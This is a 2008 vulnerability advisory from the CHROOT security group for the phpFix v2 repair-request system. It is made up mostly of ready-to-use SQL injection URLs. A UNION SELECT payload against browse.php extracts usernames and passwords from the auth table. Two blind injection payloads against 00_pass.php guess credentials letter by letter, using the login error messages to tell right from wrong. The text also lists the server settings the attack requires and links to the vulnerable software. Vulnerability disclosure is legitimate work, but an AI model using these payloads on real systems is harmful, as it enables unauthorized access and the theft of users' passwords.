|
_____ _ _ _____ _____ _____ _____ =0D
/ ___| |_| | _ \| _ | _ |_ _| =0D
| (___| _ | [_)_/| (_) | (_) | | | =0D
\_____|_| |_|_| |_||_____|_____| |_| =0D
C. H. R. O. O. T. SECURITY GROUP=0D
- -- ----- --- -- -- ---- --- -- - =0D
http://www.chroot.org=0D
=0D
_ _ _ _____ ____ ____ __ _ =0D
Hacks In Taiwan | |_| | |_ _| __| | \| |=0D
Conference 2008 | _ | | | | | (__| () | |=0D
|_| |_|_| |_| \____|____|_|\__|=0D
http://www.hitcon.org=0D
=0D
=0D
Title :: phpFix v2 Multiple SQL Injection Vulnerability=0D
=0D
Author :: unohope [at] chroot [dot] org=0D
=0D
IRC :: irc.chroot.org #chroot=0D
=0D
ScriptName :: php線上報修系統 v2=0D
=0D
Download :: http://netlab.kh.edu.tw/download/php報修系統2.zip=0D
=0D
Mirror :: http://www.badongo.com/file/9541310=0D
=0D
_______________=0D
[SQL Injection]=0D
=0D
magic_quotes_gpc = Off=0D
=0D
safe_mode = Off=0D
=0D
- {browse.php} -=0D
=0D
http://localhost/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth=0D
=0D
_____________________=0D
[Blind SQL Injection]=0D
=0D
- {00_pass.php} -=0D
=0D
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah% // for login account=0D
=0D
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% // for login password=0D
=0D
if matched, then return "密碼錯誤、請不要矇騙過關",=0D
else return "帳號錯誤、請不要矇騙過關",=0D
try error till you got it!=0D
=0D
______=0D
[NOTE]=0D
=0D
!! This is just for educational purposes, DO NOT use for illegal. !!=0D
=0D
=0D
# 2008/5/24 - chrO.ot group #=0D
=0D